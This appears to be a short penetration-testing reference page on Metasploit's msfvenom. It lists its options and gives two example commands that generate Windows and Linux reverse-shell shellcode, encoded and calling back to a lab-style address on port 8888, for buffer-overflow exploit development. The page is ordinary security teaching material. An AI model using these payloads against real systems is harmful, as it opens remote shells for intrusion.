msfvenom is an executable from Metasploit that helps generate payloads in numerous formats (ELF, PE, shellcode, PowerShell, etc) for binary exploitation, client-side attacks, and many more purposes.

Usage

msfvenom <options...>

  • -p <payload> <options>, i.e. -p windows/shell_reverse_tcp LHOST=...
    • LHOST=<local ip>
    • LPORT=8888
    • EXITFUNC=thread (to exit gracefully with ExitThread method)
  • -f <format>: payload output format, i.e. c or py styled string or exe / elf for binary
  • -v <varname>: specify a variable name used in shellcode string output
  • -e <encoder>: encoder for the payload, i.e. -e x86/shikata_ga_nai
  • -i <iters>: number of iterations to encode
  • -b <badchars>: specify bad characters, i.e. -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
  • -x <embedfile>: file / executable to embed payload into

Examples

Windows

This snippet is intended for use with Windows buffer overflow on a threaded application over HTTP & TCP.

  • Change LHOST IP address in the snippet
  • Start listener / handler on 8888

Set EXITFUNC on threaded servers/applications!

ExitThread enables reexploitation of the same service instance. Otherwise, the service will crash after the first try of exploitation.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Linux

This snippet generates a generic reverse shell shellcode in Python (e.g. for exploit development).

  • Change LHOST IP
  • Start listener on 8888.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 -b "\x00\x20" -f py -v shellcode